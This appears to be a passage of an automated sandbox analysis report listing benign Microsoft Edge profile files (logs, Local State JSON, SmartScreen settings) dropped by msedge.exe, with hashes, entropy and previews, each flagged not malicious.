C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.247117040488855
Encrypted:	false
SSDEEP:	6:iOrvRRq2PCHhJ23oH+TcwtfrK+IFUtJvRMZmwPvRBxFkwOCHhJ23oH+TcwtfrUed:7/vBYeb23FUtM/TxF56Yeb3J
MD5:	4BCE5EB3DFB4EABA746366468EE70534
SHA1:	B233611B88A4B06AB2727048755A473ACDF1148B
SHA-256:	ABE75F125ABFF2CC622CEFC40D3CB8A30A805392ED52D2541424F788DB4CDE3E
SHA-512:	44676954FFA3DE5F54EF45C27E6A707B24C939AB634E442413D53EAA18CD237B55D9D3AD38CF0D7DA37513E1DE8758D66CD3B4B14D0FEE9D2444690958837D96
Malicious:	false
Preview:	2025/01/09-08:42:28.416 1f50 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2025/01/09-08:42:28.416 1f50 Recovering log #3.2025/01/09-08:42:28.417 1f50 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.247117040488855
Encrypted:	false
SSDEEP:	6:iOrvRRq2PCHhJ23oH+TcwtfrK+IFUtJvRMZmwPvRBxFkwOCHhJ23oH+TcwtfrUed:7/vBYeb23FUtM/TxF56Yeb3J
MD5:	4BCE5EB3DFB4EABA746366468EE70534
SHA1:	B233611B88A4B06AB2727048755A473ACDF1148B
SHA-256:	ABE75F125ABFF2CC622CEFC40D3CB8A30A805392ED52D2541424F788DB4CDE3E
SHA-512:	44676954FFA3DE5F54EF45C27E6A707B24C939AB634E442413D53EAA18CD237B55D9D3AD38CF0D7DA37513E1DE8758D66CD3B4B14D0FEE9D2444690958837D96
Malicious:	false
Preview:	2025/01/09-08:42:28.416 1f50 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2025/01/09-08:42:28.416 1f50 Recovering log #3.2025/01/09-08:42:28.417 1f50 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	753
Entropy (8bit):	4.037333775091125
Encrypted:	false
SSDEEP:	12:G0nYUtTNop//z3p/Uz0RuWlJhC+lvBavRtin01zvZDEtlkyBrgxvBs:G0nYUtypD3RUovhC+lvBOL+t3IvBs
MD5:	C5675C35B320A0898802E1ECFD3476E8
SHA1:	B6CA1C2EE1340662A7B495778416988006748327
SHA-256:	8E60BB9B60A9A242D016CF5425FF3D76A94911F197B3E4AB08A417E39C2832A5
SHA-512:	DAA3E9FADF4F69A88600460F48116E50BCE1C979E4AFA7114D1B8CCEC6626520CC3725D0BB845E0FCC8587A8690D4AC495C138AB1AAC2981CAEB9C485FA0CC67
Malicious:	false
Preview:	.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....,.1..................19_.....QL.s.................18_.....<.J\|.................37_...... .A.................38_..........................39_........].................20_.....Owa..................20_.....`..N.................19_.....D8.X.................18_......`...................37_..........................38_......\e..................39_.....dz.\|.................9_.....'\c..................9_.......f-.................__global... .\|.&R.................__global... ./....................__global... ..T...................__global... .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	342
Entropy (8bit):	5.208438378327664
Encrypted:	false
SSDEEP:	6:iOrvRNsq2PCHhJ23oH+TcwtfrzAdIFUtJvRNdZmwPvRtskwOCHhJ23oH+Tcwtfrm:7bsvBYeb9FUtNd/056Yeb2J
MD5:	33354E3F41B9A4FA4B255AE14AA5F1BF
SHA1:	B42FA9E00A6FF52DCEA16E8659D5D40961816AE0
SHA-256:	EE6297220564EFD3912CCBEBFC4A669B2E50886FDB4DF2436215547033D61330
SHA-512:	CA4F81B04EF1CECAF346EA79241C6B242C79F5FBF165052C7D1188E9DD2C97211C38AA295C56284562A4C7727B450ABBD535832B616637EBF606CB9022F43306
Malicious:	false
Preview:	2025/01/09-08:42:28.413 1f50 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2025/01/09-08:42:28.413 1f50 Recovering log #3.2025/01/09-08:42:28.414 1f50 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	342
Entropy (8bit):	5.208438378327664
Encrypted:	false
SSDEEP:	6:iOrvRNsq2PCHhJ23oH+TcwtfrzAdIFUtJvRNdZmwPvRtskwOCHhJ23oH+Tcwtfrm:7bsvBYeb9FUtNd/056Yeb2J
MD5:	33354E3F41B9A4FA4B255AE14AA5F1BF
SHA1:	B42FA9E00A6FF52DCEA16E8659D5D40961816AE0
SHA-256:	EE6297220564EFD3912CCBEBFC4A669B2E50886FDB4DF2436215547033D61330
SHA-512:	CA4F81B04EF1CECAF346EA79241C6B242C79F5FBF165052C7D1188E9DD2C97211C38AA295C56284562A4C7727B450ABBD535832B616637EBF606CB9022F43306
Malicious:	false
Preview:	2025/01/09-08:42:28.413 1f50 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2025/01/09-08:42:28.413 1f50 Recovering log #3.2025/01/09-08:42:28.414 1f50 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	120
Entropy (8bit):	3.32524464792714
Encrypted:	false
SSDEEP:	3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
MD5:	A397E5983D4A1619E36143B4D804B870
SHA1:	AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
SHA-256:	9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
SHA-512:	4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
Malicious:	false
Preview:	C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	13
Entropy (8bit):	2.7192945256669794
Encrypted:	false
SSDEEP:	3:NYLFRQI:ap2I
MD5:	BF16C04B916ACE92DB941EBB1AF3CB18
SHA1:	FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
SHA-256:	7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
SHA-512:	F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
Malicious:	false
Preview:	117.0.2045.47

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44170
Entropy (8bit):	6.090532942728926
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kjCLmZtUtR96hOxq4gFkFDlwWE7RTupzKscDX//NPCh:z/Ps+wsI7ynQtGhOxqQoRTuiVIos
MD5:	D46F83649063023E24C48B922C951992
SHA1:	8EBBA43B5208A2A209CB65141F50888255C51E89
SHA-256:	8F38B86375E275AEE03A94E545D81E5762DB131ADCD39215DFCB2BBEAFAEF492
SHA-512:	74830E2B8F22B8B75AD932711B3AE49DE239FB50378EECE912ACA8F4ABCDD3C0DC3EFD03AA8C0BD229C783BA24C16BB8DD8CF2FBBCDF6303C9BC61C0B1F1D3F3
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3472c.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44170
Entropy (8bit):	6.090532942728926
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kjCLmZtUtR96hOxq4gFkFDlwWE7RTupzKscDX//NPCh:z/Ps+wsI7ynQtGhOxqQoRTuiVIos
MD5:	D46F83649063023E24C48B922C951992
SHA1:	8EBBA43B5208A2A209CB65141F50888255C51E89
SHA-256:	8F38B86375E275AEE03A94E545D81E5762DB131ADCD39215DFCB2BBEAFAEF492
SHA-512:	74830E2B8F22B8B75AD932711B3AE49DE239FB50378EECE912ACA8F4ABCDD3C0DC3EFD03AA8C0BD229C783BA24C16BB8DD8CF2FBBCDF6303C9BC61C0B1F1D3F3
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF34bcf.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44170
Entropy (8bit):	6.090532942728926
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kjCLmZtUtR96hOxq4gFkFDlwWE7RTupzKscDX//NPCh:z/Ps+wsI7ynQtGhOxqQoRTuiVIos
MD5:	D46F83649063023E24C48B922C951992
SHA1:	8EBBA43B5208A2A209CB65141F50888255C51E89
SHA-256:	8F38B86375E275AEE03A94E545D81E5762DB131ADCD39215DFCB2BBEAFAEF492
SHA-512:	74830E2B8F22B8B75AD932711B3AE49DE239FB50378EECE912ACA8F4ABCDD3C0DC3EFD03AA8C0BD229C783BA24C16BB8DD8CF2FBBCDF6303C9BC61C0B1F1D3F3
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF34e5f.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44170
Entropy (8bit):	6.090532942728926
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kjCLmZtUtR96hOxq4gFkFDlwWE7RTupzKscDX//NPCh:z/Ps+wsI7ynQtGhOxqQoRTuiVIos
MD5:	D46F83649063023E24C48B922C951992
SHA1:	8EBBA43B5208A2A209CB65141F50888255C51E89
SHA-256:	8F38B86375E275AEE03A94E545D81E5762DB131ADCD39215DFCB2BBEAFAEF492
SHA-512:	74830E2B8F22B8B75AD932711B3AE49DE239FB50378EECE912ACA8F4ABCDD3C0DC3EFD03AA8C0BD229C783BA24C16BB8DD8CF2FBBCDF6303C9BC61C0B1F1D3F3
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF37475.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44170
Entropy (8bit):	6.090532942728926
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kjCLmZtUtR96hOxq4gFkFDlwWE7RTupzKscDX//NPCh:z/Ps+wsI7ynQtGhOxqQoRTuiVIos
MD5:	D46F83649063023E24C48B922C951992
SHA1:	8EBBA43B5208A2A209CB65141F50888255C51E89
SHA-256:	8F38B86375E275AEE03A94E545D81E5762DB131ADCD39215DFCB2BBEAFAEF492
SHA-512:	74830E2B8F22B8B75AD932711B3AE49DE239FB50378EECE912ACA8F4ABCDD3C0DC3EFD03AA8C0BD229C783BA24C16BB8DD8CF2FBBCDF6303C9BC61C0B1F1D3F3
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF39d89.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44170
Entropy (8bit):	6.090532942728926
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kjCLmZtUtR96hOxq4gFkFDlwWE7RTupzKscDX//NPCh:z/Ps+wsI7ynQtGhOxqQoRTuiVIos
MD5:	D46F83649063023E24C48B922C951992
SHA1:	8EBBA43B5208A2A209CB65141F50888255C51E89
SHA-256:	8F38B86375E275AEE03A94E545D81E5762DB131ADCD39215DFCB2BBEAFAEF492
SHA-512:	74830E2B8F22B8B75AD932711B3AE49DE239FB50378EECE912ACA8F4ABCDD3C0DC3EFD03AA8C0BD229C783BA24C16BB8DD8CF2FBBCDF6303C9BC61C0B1F1D3F3
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF45deb.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44170
Entropy (8bit):	6.090532942728926
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kjCLmZtUtR96hOxq4gFkFDlwWE7RTupzKscDX//NPCh:z/Ps+wsI7ynQtGhOxqQoRTuiVIos
MD5:	D46F83649063023E24C48B922C951992
SHA1:	8EBBA43B5208A2A209CB65141F50888255C51E89
SHA-256:	8F38B86375E275AEE03A94E545D81E5762DB131ADCD39215DFCB2BBEAFAEF492
SHA-512:	74830E2B8F22B8B75AD932711B3AE49DE239FB50378EECE912ACA8F4ABCDD3C0DC3EFD03AA8C0BD229C783BA24C16BB8DD8CF2FBBCDF6303C9BC61C0B1F1D3F3
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Nurturing\campaign_history

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6773696719930975
Encrypted:	false
SSDEEP:	12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
MD5:	6FFCCB198DC6B17E165460E6E246B03C
SHA1:	014A46B0E6E84089E1C20FA232F54CA737D5F023
SHA-256:	D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
SHA-512:	846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	47
Entropy (8bit):	4.3818353308528755
Encrypted:	false
SSDEEP:	3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
MD5:	48324111147DECC23AC222A361873FC5
SHA1:	0DF8B2267ABBDBD11C422D23338262E3131A4223
SHA-256:	D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
SHA-512:	E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
Malicious:	false
Preview:	customSettings_F95BA787499AB4FA9EFFF472CE383A14

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	35
Entropy (8bit):	4.014438730983427
Encrypted:	false
SSDEEP:	3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
MD5:	BB57A76019EADEDC27F04EB2FB1F1841
SHA1:	8B41A1B995D45B7A74A365B6B1F1F21F72F86760
SHA-256:	2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
SHA-512:	A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
Malicious:	false
Preview:	{"forceServiceDetermination":false}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	81
Entropy (8bit):	4.3439888556902035
Encrypted:	false
SSDEEP:	3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
MD5:	177F4D75F4FEE84EF08C507C3476C0D2
